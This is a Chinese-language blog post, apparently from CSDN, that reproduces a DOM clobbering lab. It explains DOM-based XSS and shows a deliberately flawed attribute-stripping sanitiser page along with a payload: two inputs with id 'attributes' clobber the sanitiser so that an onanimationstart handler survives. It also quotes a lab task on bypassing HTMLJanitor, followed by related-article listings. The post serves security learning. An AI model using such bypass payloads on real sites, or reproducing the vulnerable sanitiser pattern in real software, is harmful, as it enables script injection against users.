Dom破坏案例复现

最新推荐文章于 2024-09-28 00:15:00 发布
最新推荐文章于 2024-09-28 00:15:00 发布
阅读量807 收藏 6
点赞数 8
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gggghcvg/article/details/141328399
版权 
 

什么是Dom
 

 

Dom是一个与平台,编程语言无关的端口,它允许程序或者脚本动态的访问和更新文档的内容,结果和样式,处理后的结果能够成为显示的一部分,不依赖于提交数据到服务器端,从而客户端获得Dom中的数据在本地执行,如果Dom中的数据没有经过严格的确定,就会产生Dom型XSS漏洞。
 

编写html文件
 

<!DOCTYPE html>
 

<html lang="en">
 

<head>
 

    <meta charset="UTF-8">
 

    <meta name="author" content="system">
 

    <meta name="keywords" content="whoami">
 

    <meta name="viewport" content="width=device-width,initial-scale=1.0">
 

    <title>
 

        <script>alert(1)</script>
 

    </title>
 

</head>
 

 

<body>
 

   <div class="aaaaa" id="bbbbbb">aaaaaa</div>
 

</body>
 

<script>
 

    const data = decodeURIComponent(location.hash.substr(1))
 

    const root = document.createElement('div')
 

    root.innerHTML = data
 

 

   for(let el of root.querySelectorAll('*')){
         let attrs = [];
 

        for (let attr of el.attributes){
             attrs.push(attr.name)
 

        }
 

        for (let name of attrs){
             el.removeAttribute(name);
 

        }
 

    }
 

    } 
 

    document.body.appendChild(root);
 

</script>
 

</html>
 

用DOM破坏实现留下非法的函数
 

利用style标签定义一个空动画
 

在动画开始的时候会触发onanimationstart事件,因为el.attributes已经被后门的两个input占了,所以标签里面的内容不会删除,只会删除input
 

<body>
 

   <style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert()"><input id="attributes"><input id="attributes">
 

结果显示
 

 

本实验使用 HTMLJanitor 库,该库容易受到 DOM 破坏。为了解决这个实验,请构造一个绕过过滤器的向量,并使用 DOM 拼接来注入一个调用 print() 函数的向量。您可能需要使用漏洞利用服务器才能使您的向量在受害者的浏览器中自动执行。
 

请记住更改 URL 以包含您的实验室 ID,并确保 postId 参数与您在上一步中注入 HTML 的博客文章的 postId 匹配。
 

存储漏洞并将其交付给受害者。

                

        

        

    

  


    

      

        

            

              
                
                  gggghcvg
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
[系统安全] 十五.Chrome密码保存功能渗透解析、Chrome蓝屏漏洞及音乐软件漏洞复现

				
			

			

				

					杨秀璋的专栏
				

				

					01-21
					
					9981
					
				

			

		

		

			
				
作者前面详细介绍了熊猫烧香病毒的逆向分析过程。这篇文章换个主题继续介绍,本文将对Chrome浏览器保留密码的功能进行渗透解析;同时复现一个最近流行的漏洞,通过Chrome浏览器实现Win10蓝屏;最后介绍音乐软件的加密功能及漏洞复现。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,开发厂商进行相关的漏洞修补,安全保障任重道远。

			
		

	



                

              
                



	

		

			

				
					
DOM破坏案例复现

				
			

			

				

					m0_64802817的博客
				

				

					08-18
					
					258
					
				

			

		

		

			
				
在动画开始的时候会触发onanimationstart事件,因为el.attributes已经被后门的两个input占了,所以标签里面的内容不会删除,只会删除input

			
		

	



                


  
              

                


	

		

			

				
					
复现DOM破坏案例

				
			

			

				

					weixin_61552310的博客
				

				

					08-17
					
					1045
					
				

			

		

		

			
				
这里的意思为获取url中的get参数somebody,如果有那么就设置h2的值为get参数的值,如果没有则为"Somebody" + " Toucha Ma Spaghet!href的值要遵守protocol:uri的格式,查看DOMPurify的源码,支持的合法的协议有mailto, tel, xmpp等。这里我们尝试闭合单引号后,让程序执行我们输入的alert(1),然后把后面的部分注释掉。首先构造ok,id=ok,由于a标签会返回href的值,因此选择<a>标签作为构造对象。Ma Spaghet!

			
		

	





	

		

			

				
					
复现dom破坏案例和靶场

				
			

			

				

					weixin_73298423的博客
				

				

					08-18
					
					780
					
				

			

		

		

			
				
dom破坏

			
		

	



		

			
		



	

		

			

				
					
复现DOM破坏案例&靶场

				
			

			

				

					GaoXianGaoXian的博客
				

				

					08-18
					
					316
					
				

			

		

		

			
				
复现DOM破坏案例&靶场

			
		

	





	

		

			

				
					
XSS-复现dom破坏案例和靶场

				
			

			

				

					山月不问人间事
				

				

					08-18
					
					1007
					
				

			

		

		

			
				
首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路;可以看到括号丢失 ,因为url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码。所以我们这里只能换一种思路,他不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码。

			
		

	





	

		

			

				
					
DOM破坏原理与漏洞复现

				
			

			

				

					2301_80177550的博客
				

				

					08-18
					
					660
					
				

			

		

		

			
				
Dom Clobbering(Dom破坏) 就是⼀种将 HTML 代码注入页面中以操纵 DOM 并最终更改页面上 JavaScript 行为的技术。在无法直接XSS的情况下,我们就可以往DOM Clobbering 这⽅向考虑了。其实 Dom Clobbering 比较简单,我们看几个简单的例⼦就能知道它是⼲什么了的。

			
		

	





	

		

			

				
					
XSS---DOM破坏靶场复现

				
			

			

				

					qq_64395221的博客
				

				

					08-17
					
					821
					
				

			

		

		

			
				
但是没有任何反应,通过F12查看,发现img标签里面只有“src=1”,onerror=”alert(1)”被丢弃了,原因是存在DOMPurify.sanitize过滤框架,并且该框架绕过几率几乎很小。这是因为它的属性移除是在同一个数组上操作的,假如这个数组里有a、b、c三个 属性,当将a删除后,指针会往下走一步,但是由于第一位的a被删除,那么b会往上移一位,所以b不会被删除。将data插到div里, 获取div里面的子函数,拿到标签里面的所有属性,然后将属性进行移除。然而,嵌套结构中,内层的。

			
		

	





	

		

			

				
					
DOM破环和两个实验的复现

				
			

			

				

					lyz_yyds107的博客
				

				

					08-02
					
					274
					
				

			

		

		

			
				
这就又涉及到了循环的过程中,attr首先匹配到的是src元素,然后就会直接删除,删除了之后,紧跟着的这个onerror会自动往前移动,来替代了,之前这个位置,这时候我们要知道索引也跟着变化了,所以再循环的时候发现没有了,就跳出了循环,所以留下了这个onerror。首先我们来了解一下DOM和window的关系,如果你在HTML中,设定一个有id的元素之后,在js中就可以直接操作,又由于js的作用域规则,就算直接用btn也可以,因为在当前的作用域找到时就会往上找,一路找到window。还是报错,为什么呢?...

			
		

	





	

		

			

				
					
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

				
			

			

				

					杨秀璋的专栏
				

				

					12-28
					
					9643
					
				

			

		

		

			
				
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。

			
		

	





	

		

			

				
					
软件测试-面试题(基础+性能+安全

				
			

			

				

					hyhrosewind
				

				

					08-08
					
					1299
					
				

			

		

		

			
				
失效恢复测试一般是对具有负载均衡的系统或者是具有备份的系统进行的,主要是为了测试当系统局部发生故障时,是否会对全局产生较大的影响,产生的影响是否在可以接受的范围内,以及用户是否能够继续使用系统(还要关注失效后,系统还能支持多少用户并发操作,以及出现这种情况,可以采用哪些应急方案来快速解决问题。12)现网性能测试:在真实的环境下做性能测试(为了得出最真实的数据,这种类型的测试要注意一些问题对网络性能的影响,比如占用过多的带宽,影响其他业务,垃圾数据的清理等。测试项一般只写一个测试目的,不要一次测试多个点;

			
		

	





	

		

			

				
					
红队专题-Web安全/渗透测试-注入攻击

				
			

			

				

					aming小老弟
				

				

					10-27
					
					191
					
				

			

		

		

			
				
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

			
		

	





	

		

			

				
					
网络安全详解

				
			

			

				

					weidl001的博客
				

				

					09-21
					
					1510
					
				

			

		

		

			
				
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。

			
		

	





	

		

			

				
					
网络安全全方略

				
			

			

				

					AI逍遥子
				

				

					09-25
					
					1291
					
				

			

		

		

			
				
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。

			
		

	





	

		

			

				
					
信息安全工程师(24)网络安全体系建设原则与安全策略

					
最新发布

				
			

			

				

					m0_73399576的博客
				

				

					09-28
					
					807
					
				

			

		

		

			
				
信息安全工程师——网络安全体系建设原则与安全策略篇

			
		

	





	

		

			

				
					
Linux 网络安全守护:构建安全防线的最佳实践

				
			

			

				

					weixin_62641226的博客
				

				

					09-23
					
					1023
					
				

			

		

		

			
				
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。

			
		

	





	

		

			

				
					
Web安全-SQL注入之联合查询注入

				
			

			

				

					m0_60984906的博客
				

				

					09-25
					
					334
					
				

			

		

		

			
				
Web安全SQL注入之联合查询注入墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)

			
		

	





	

		

			

				
					
【网络安全】网络基础第一阶段——第三节:网络协议基础---- VLAN、Trunk与三层交换技术

				
			

			

				

					goldfish8848的博客
				

				

					09-25
					
					863
					
				

			

		

		

			
				
交换机(Switch)是一种基于帧的目的地址过滤、转发或泛洪的网络设备,也被称为多端口网桥。它工作在OSI模型的第二层(数据链路层),主要处理以太网帧的转发。想象一下,你在一个繁忙的邮局工作。邮局里有很多信箱,每个信箱都有一个特定的编号,就像网络中的每个设备都有一个独一无二的MAC地址。你的工作是确保每封信都能准确无误地送到正确的信箱。分拣信件:当一封信寄到邮局时,你会查看信封上的地址(在网络中就是MAC地址),然后决定把它放到哪个信箱里。这就是交换机的“帧转发”功能。记住地址。

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值